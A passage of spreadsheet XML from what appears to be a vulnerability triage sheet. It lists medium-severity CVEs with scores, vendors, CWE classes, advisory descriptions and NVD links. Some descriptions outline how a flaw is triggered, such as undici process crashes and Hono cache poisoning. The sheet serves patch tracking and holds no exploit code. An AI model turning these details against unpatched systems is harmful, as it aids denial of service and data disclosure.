          <t>Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 39.8.7, 40.9.0, 41.2.0, and 42.0.0-beta.1, serial-port and media permission checks made from an iframe passed the top-level frame origin to session.setPermissionCheckHandler instead of the requesting iframe origin. Origin-based handler logic could grant a cross-origin iframe device access intended only for the top-level origin. This issue is fixed in 39.8.7, 40.9.0, 41.2.0, and 42.0.0-beta.1.</t>
        </is>
      </c>
      <c r="M1697" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70599</t>
        </is>
      </c>
    </row>
    <row r="1698">
      <c r="A1698" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1698" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70605</t>
        </is>
      </c>
      <c r="C1698" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D1698" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1698" s="5" t="inlineStr"/>
      <c r="F1698" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1698" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1698" s="5" t="inlineStr"/>
      <c r="I1698" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J1698" s="5" t="inlineStr"/>
      <c r="K1698" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1698" s="5" t="inlineStr">
        <is>
          <t>Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 39.8.8, 40.9.0, 41.2.1, and 42.0.0-beta.3, when following HTTP redirects, net.fetch() and net.request() did not restrict which schemes a redirect could target. A remote server could redirect a request to a local resource, and if the app returns or forwards the response body, local file contents could be disclosed. Apps are only affected if they make net requests to attacker-influenced URLs with redirects followed and expose the response body. This issue is fixed in versions 39.8.8, 40.9.0, 41.2.1, and 42.0.0-beta.3.</t>
        </is>
      </c>
      <c r="M1698" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70605</t>
        </is>
      </c>
    </row>
    <row r="1699">
      <c r="A1699" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1699" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70606</t>
        </is>
      </c>
      <c r="C1699" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D1699" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1699" s="5" t="inlineStr"/>
      <c r="F1699" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1699" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1699" s="5" t="inlineStr"/>
      <c r="I1699" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J1699" s="5" t="inlineStr"/>
      <c r="K1699" s="5" t="inlineStr">
        <is>
          <t>CWE-668</t>
        </is>
      </c>
      <c r="L1699" s="5" t="inlineStr">
        <is>
          <t>Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 40.10.6, 41.9.1, 42.5.1, and 43.0.0, when a custom protocol handler returned a ProtocolResponse with a url and no session, Electron made the upstream request through defaultSession instead of the session that handled the protocol. A cached response could then be reused across otherwise isolated session partitions. Apps that use ProtocolResponse.url, omit ProtocolResponse.session, and rely on separate sessions to isolate content are affected. This issue is fixed in versions 40.10.6, 41.9.1, 42.5.1, and 43.0.0.</t>
        </is>
      </c>
      <c r="M1699" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70606</t>
        </is>
      </c>
    </row>
    <row r="1700">
      <c r="A1700" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1700" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72978</t>
        </is>
      </c>
      <c r="C1700" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D1700" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1700" s="5" t="inlineStr"/>
      <c r="F1700" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1700" s="5" t="inlineStr">
        <is>
          <t>active directory</t>
        </is>
      </c>
      <c r="H1700" s="5" t="inlineStr"/>
      <c r="I1700" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1700" s="5" t="inlineStr"/>
      <c r="K1700" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1700" s="5" t="inlineStr">
        <is>
          <t>Allocation of resources without limits or throttling in Active Directory Federation Services (AD FS) allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M1700" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72978</t>
        </is>
      </c>
    </row>
    <row r="1701">
      <c r="A1701" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1701" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78123</t>
        </is>
      </c>
      <c r="C1701" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D1701" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1701" s="5" t="inlineStr"/>
      <c r="F1701" s="5" t="inlineStr"/>
      <c r="G1701" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="H1701" s="5" t="inlineStr"/>
      <c r="I1701" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J1701" s="5" t="inlineStr"/>
      <c r="K1701" s="5" t="inlineStr">
        <is>
          <t>CWE-825</t>
        </is>
      </c>
      <c r="L1701" s="5" t="inlineStr">
        <is>
          <t>strongSwan 5.0.2 through 6.0.7 has an Expired Pointer Dereference in PKCS#7 parsing in the openssl plugin.</t>
        </is>
      </c>
      <c r="M1701" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78123</t>
        </is>
      </c>
    </row>
    <row r="1702">
      <c r="A1702" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1702" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78221</t>
        </is>
      </c>
      <c r="C1702" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D1702" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1702" s="5" t="inlineStr"/>
      <c r="F1702" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1702" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1702" s="5" t="inlineStr"/>
      <c r="I1702" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1702" s="5" t="inlineStr"/>
      <c r="K1702" s="5" t="inlineStr">
        <is>
          <t>CWE-131</t>
        </is>
      </c>
      <c r="L1702" s="5" t="inlineStr">
        <is>
          <t>An incorrect buffer size calculation in the Windows Interactive Service in OpenVPN 2.7_alpha1 through 2.7.6 allows local authenticated users to cause memory corruption or disclose sensitive information via crafted NRPT inputs.</t>
        </is>
      </c>
      <c r="M1702" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78221</t>
        </is>
      </c>
    </row>
    <row r="1703">
      <c r="A1703" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1703" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78620</t>
        </is>
      </c>
      <c r="C1703" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D1703" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1703" s="5" t="inlineStr"/>
      <c r="F1703" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1703" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="H1703" s="5" t="inlineStr"/>
      <c r="I1703" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1703" s="5" t="inlineStr"/>
      <c r="K1703" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L1703" s="5" t="inlineStr">
        <is>
          <t>The Okta Access Gateway Kerberos configuration handler does not validate file paths specified in event payloads before writing file contents. The path from the event payload is used directly as the write destination, resulting in files being written to unintended locations on the appliance filesystem.</t>
        </is>
      </c>
      <c r="M1703" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78620</t>
        </is>
      </c>
    </row>
    <row r="1704">
      <c r="A1704" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1704" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84185</t>
        </is>
      </c>
      <c r="C1704" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D1704" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1704" s="5" t="inlineStr"/>
      <c r="F1704" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1704" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1704" s="5" t="inlineStr"/>
      <c r="I1704" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1704" s="5" t="inlineStr"/>
      <c r="K1704" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L1704" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the jwcrypto library, which is used for implementing Javascript Object Signing and Encryption (JOSE) standards. The issue occurs when the library verifies a General JSON Serialization JWS using a set of keys. Due to a coding error, the library fails to correctly identify the specific key ID (kid) and may instead accept a signature made by any valid key in the set. This can allow an attacker with a valid key to bypass authorization checks in applications that rely on the key ID to identify specific tenants or users.</t>
        </is>
      </c>
      <c r="M1704" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84185</t>
        </is>
      </c>
    </row>
    <row r="1705">
      <c r="A1705" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1705" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84363</t>
        </is>
      </c>
      <c r="C1705" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D1705" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1705" s="5" t="inlineStr"/>
      <c r="F1705" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1705" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1705" s="5" t="inlineStr"/>
      <c r="I1705" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1705" s="5" t="inlineStr"/>
      <c r="K1705" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="L1705" s="5" t="inlineStr">
        <is>
          <t>Hono is a Web application framework that provides support for any JavaScript runtime. Prior to 4.13.5, Hono's query helpers treat a question mark after a literal hash fragment as the start of a query string, so the application can read request parameters that browsers, new URL(), reverse proxies, filtering rules, parameter allow and deny lists, access logging, request validation, and other middleware do not observe. The Cache Middleware removes the fragment when building its cache key, allowing a response influenced by parameters inside the fragment to be stored under a key that omits those parameters and later served to other users. This can bypass filtering and auditing, poison cached responses, and enable stored cross-site scripting when an affected parameter is reflected into cached HTML without escaping. Exploitation requires a runtime and intermediary path that passes a literal hash character through to the request URL; Cloudflare Workers and intermediaries that strip fragments are not affected. This issue is fixed in version 4.13.5.</t>
        </is>
      </c>
      <c r="M1705" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84363</t>
        </is>
      </c>
    </row>
    <row r="1706">
      <c r="A1706" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1706" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84378</t>
        </is>
      </c>
      <c r="C1706" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D1706" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1706" s="5" t="inlineStr"/>
      <c r="F1706" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1706" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1706" s="5" t="inlineStr"/>
      <c r="I1706" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J1706" s="5" t="inlineStr"/>
      <c r="K1706" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="L1706" s="5" t="inlineStr">
        <is>
          <t>HTTPX2 is a next generation HTTP client for Python. From 2.5.0 until 2.10.0, the HTTPX2 Server-Sent Events parser in src/httpx2/httpx2/_sse.py repeatedly copies and rescans buffered text in _SSELineDecoder.decode() when an attacker-controlled or compromised SSE endpoint splits one unterminated line across many response chunks. The behavior affects httpx2.Client.sse() and httpx2.AsyncClient.sse(), and the total processing work grows quadratically with the line length, allowing a crafted stream to consume excessive CPU and block a synchronous worker or asynchronous event loop. This issue is fixed in version 2.10.0.</t>
        </is>
      </c>
      <c r="M1706" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84378</t>
        </is>
      </c>
    </row>
    <row r="1707">
      <c r="A1707" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1707" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84970</t>
        </is>
      </c>
      <c r="C1707" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D1707" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1707" s="5" t="inlineStr"/>
      <c r="F1707" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1707" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H1707" s="5" t="inlineStr">
        <is>
          <t>mongodb:c\+\+_driver</t>
        </is>
      </c>
      <c r="I1707" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1707" s="5" t="inlineStr"/>
      <c r="K1707" s="5" t="inlineStr">
        <is>
          <t>CWE-681</t>
        </is>
      </c>
      <c r="L1707" s="5" t="inlineStr">
        <is>
          <t>A numeric truncation weakness exists in the JSON parsing component of the MongoDB C++ Driver's BSON library. An actor who controls the text that an embedding application hands to the library's public JSON parsing interface, when that text is very large, can cause the library to read memory beyond the supplied buffer and return it to the caller, to silently accept only part of the input as a complete document, or to terminate the process. No MongoDB server, credentials, or non-default configuration is required; the effect is confined to the process that uses the library.</t>
        </is>
      </c>
      <c r="M1707" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84970</t>
        </is>
      </c>
    </row>
    <row r="1708">
      <c r="A1708" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1708" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85014</t>
        </is>
      </c>
      <c r="C1708" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D1708" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1708" s="5" t="inlineStr"/>
      <c r="F1708" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1708" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1708" s="5" t="inlineStr"/>
      <c r="I1708" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1708" s="5" t="inlineStr"/>
      <c r="K1708" s="5" t="inlineStr">
        <is>
          <t>CWE-248, CWE-754</t>
        </is>
      </c>
      <c r="L1708" s="5" t="inlineStr">
        <is>
          <t>undici's experimental WebSocketStream client crashes the whole Node.js process when a remote peer closes the TCP connection without a WebSocket close handshake. On an unclean close the internal socket-close handler calls abort on the writable stream unconditionally and discards the returned promise, but per the WHATWG Streams standard aborting a locked writable returns a promise that rejects with a TypeError. Because the application holds a writer on that writable, which is the only way to write, the rejection is never observed and Node's default unhandled-rejection behavior terminates the process. An untrusted server can therefore crash a client with a single abrupt disconnect, with no authentication and no application mistake. This affects undici versions from 7.0.0 up to 7.29.1 and from 8.0.0 up to 8.10.2. Users should upgrade to undici 7.29.1 or 8.10.2.</t>
        </is>
      </c>
      <c r="M1708" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85014</t>
        </is>
      </c>
    </row>
    <row r="1709">
      <c r="A1709" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1709" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85024</t>
        </is>
      </c>
      <c r="C1709" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D1709" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1709" s="5" t="inlineStr"/>
      <c r="F1709" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1709" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1709" s="5" t="inlineStr"/>
      <c r="I1709" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1709" s="5" t="inlineStr"/>
      <c r="K1709" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="L1709" s="5" t="inlineStr">
        <is>
          <t>undici bundles a WebSocket client whose permessage-deflate size-limit cleanup removes all listeners from the internal zlib inflate stream, including its error listener, while that stream can still emit. When a remote peer sends a compressed payload that crosses the built-in 128 MiB decompressed-payload limit and then contains a malformed DEFLATE byte, the inflate stream emits a data error with no listener attached, which Node.js treats as a fatal unhandled error and terminates the entire process. Exploitation is remote and unauthenticated, requires no application mistake, and is asymmetric, since roughly 130 KB on the wire expands past the limit and crashes the process, and reconnecting can repeat the crash. This affects undici versions from 6.25.0 up to 6.28.1, from 7.28.0 up to 7.29.1, and from 8.1.0 up to 8.10.2. Users should upgrade to undici 6.28.1, 7.29.1, or 8.10.2.</t>
        </is>
      </c>
      <c r="M1709" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85024</t>
        </is>
      </c>
    </row>
    <row r="1710">
      <c r="A1710" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1710" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87123</t>
        </is>
      </c>
      <c r="C1710" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D1710" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1710" s="5" t="inlineStr"/>
      <c r="F1710" s="5" t="inlineStr"/>
      <c r="G1710" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1710" s="5" t="inlineStr"/>
      <c r="I1710" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J1710" s="5" t="inlineStr"/>
      <c r="K1710" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="L1710" s="5" t="inlineStr">
        <is>
          <t>hbs is an Express view engine wrapper for Handlebars. Version 4.3.0 can crash the Node.js process during output escaping when an async helper, registered with registerAsyncHelper, resolves to an object whose toHTML property is truthy but not callable. Handlebars escapeExpression calls the toHTML method on any value that has a truthy toHTML, so such a value throws a TypeError, and because the async substitution runs on a later tick outside the render function's try/catch, the throw is an uncaught exception that terminates the process without sending a response. Only version 4.3.0 is affected, since the throwing escape was introduced by the fix for CVE-2026-16231 and earlier versions do not escape async helper values. It can be triggered remotely when an async helper resolves to an externally influenced object such as parsed JSON. The issue is fixed in hbs 4.3.1, and users should upgrade to hbs 4.3.1 or later.</t>
        </is>
      </c>
      <c r="M1710" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87123</t>
        </is>
      </c>
    </row>
    <row r="1711">
      <c r="A1711" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1711" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88763</t>
        </is>
      </c>
      <c r="C1711" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D1711" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1711" s="5" t="inlineStr"/>
      <c r="F1711" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1711" s="5" t="inlineStr">
        <is>
          <t>red hat</t>
        </is>
      </c>
      <c r="H1711" s="5" t="inlineStr"/>
      <c r="I1711" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1711" s="5" t="inlineStr"/>
      <c r="K1711" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="L1711" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the skupper-router component of Red Hat Service Interconnect, which is used to provide secure communication between distributed services. The issue occurs when the router processes a specially crafted network message using its AMQP field parser. Due to a lack of bounds on recursion during parsing, the router can run out of stack memory and crash, leading to a denial of service for the interconnected network.</t>
        </is>
      </c>
      <c r="M1711" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88763</t>
        </is>
      </c>
    </row>
    <row r="1712">
      <c r="A1712" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1712" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9036</t>
        </is>
      </c>
      <c r="C1712" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D1712" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1712" s="5" t="inlineStr"/>
      <c r="F1712" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1712" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1712" s="5" t="inlineStr">
        <is>
          <t>ibm:netezza_performance_server</t>
        </is>
      </c>
      <c r="I1712" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1712" s="5" t="inlineStr"/>
      <c r="K1712" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L1712" s="5" t="inlineStr">
        <is>
          <t>IBM Netezza Software 11.3.0.3 through Interim Fix 002 does not validate or improperly validates TLS certificate validation, which could allow an attacker to obtain sensitive information using man in the middle techniques.</t>
        </is>
      </c>
      <c r="M1712" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9036</t>
        </is>
      </c>
    </row>
    <row r="1713">
      <c r="A1713" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1713" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9744</t>
        </is>
      </c>
      <c r="C1713" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D1713" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1713" s="5" t="inlineStr"/>
      <c r="F1713" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1713" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1713" s="5" t="inlineStr">
        <is>
          <t>ibm:netezza_performance_server</t>
        </is>
      </c>
      <c r="I1713" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1713" s="5" t="inlineStr"/>
      <c r="K1713" s="5" t="inlineStr">
        <is>
          <t>CWE-297</t>
        </is>
      </c>
      <c r="L1713" s="5" t="inlineStr">
        <is>
          <t>IBM Netezza Software 11.3.0.3 through Interim Fix 002 does not validate or improperly validates TLS certificate validation, which could allow an attacker to obtain sensitive information using man in the middle techniques.</t>
        </is>
      </c>
      <c r="M1713" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9744</t>
        </is>
      </c>
    </row>
    <row r="1714">
      <c r="A1714" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1714" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0306</t>
        </is>
      </c>
      <c r="C1714" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="D1714" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1714" s="5" t="inlineStr"/>
      <c r="F1714" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1714" s="5" t="inlineStr">
        <is>
          <t>palo alto</t>
        </is>
      </c>
      <c r="H1714" s="5" t="inlineStr"/>
      <c r="I1714" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1714" s="5" t="inlineStr"/>
      <c r="K1714" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L1714" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the EndPoint Data Loss Prevention (DLP) enforcement of Palo Alto Networks Prisma® Access Agent enables a local user to bypass configured DLP policy enforcement controls and exfiltrate sensitive data. 
This Prisma Access Agent on macOS, Linux,  iOS, Android and Chrome OS is not affected.</t>
        </is>
      </c>
      <c r="M1714" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0306</t>
        </is>
      </c>
    </row>
    <row r="1715">
      <c r="A1715" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1715" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69129</t>
        </is>
      </c>
      <c r="C1715" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="D1715" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1715" s="5" t="inlineStr"/>
      <c r="F1715" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1715" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H1715" s="5" t="inlineStr"/>
      <c r="I1715" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J1715" s="5" t="inlineStr"/>
      <c r="K1715" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1715" s="5" t="inlineStr">
        <is>
          <t>KubePi is a Kubernetes multi-cluster management panel. In versions up to and including 2.0.0, cluster-scoped APIs do not consistently validate per-cluster access, allowing an authenticated user with cluster management permissions to operate on clusters outside the scope they were granted. Because the affected endpoints act on cluster-specific data without confirming that the requesting user is authorized for that particular cluster, a user assigned management rights over one cluster can, under certain role and cluster configurations, read or modify data in clusters they should not manage. This issue is fixed in version 2.0.1.</t>
        </is>
      </c>
      <c r="M1715" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69129</t>
        </is>
      </c>
    </row>
    <row r="1716">
      <c r="A1716" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1716" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69559</t>
        </is>
      </c>
      <c r="C1716" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="D1716" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1716" s="5" t="inlineStr"/>
      <c r="F1716" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1716" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1716" s="5" t="inlineStr"/>
      <c r="I1716" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1716" s="5" t="inlineStr"/>
      <c r="K1716" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="L1716" s="5" t="inlineStr">
        <is>
          <t>Origin validation error in Microsoft Teams for Android allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1716" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69559</t>
        </is>
      </c>
    </row>
    <row r="1717">
      <c r="A1717" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1717" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72764</t>
        </is>
      </c>
      <c r="C1717" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="D1717" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1717" s="5" t="inlineStr"/>
      <c r="F1717" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1717" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1717" s="5" t="inlineStr"/>
      <c r="I1717" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
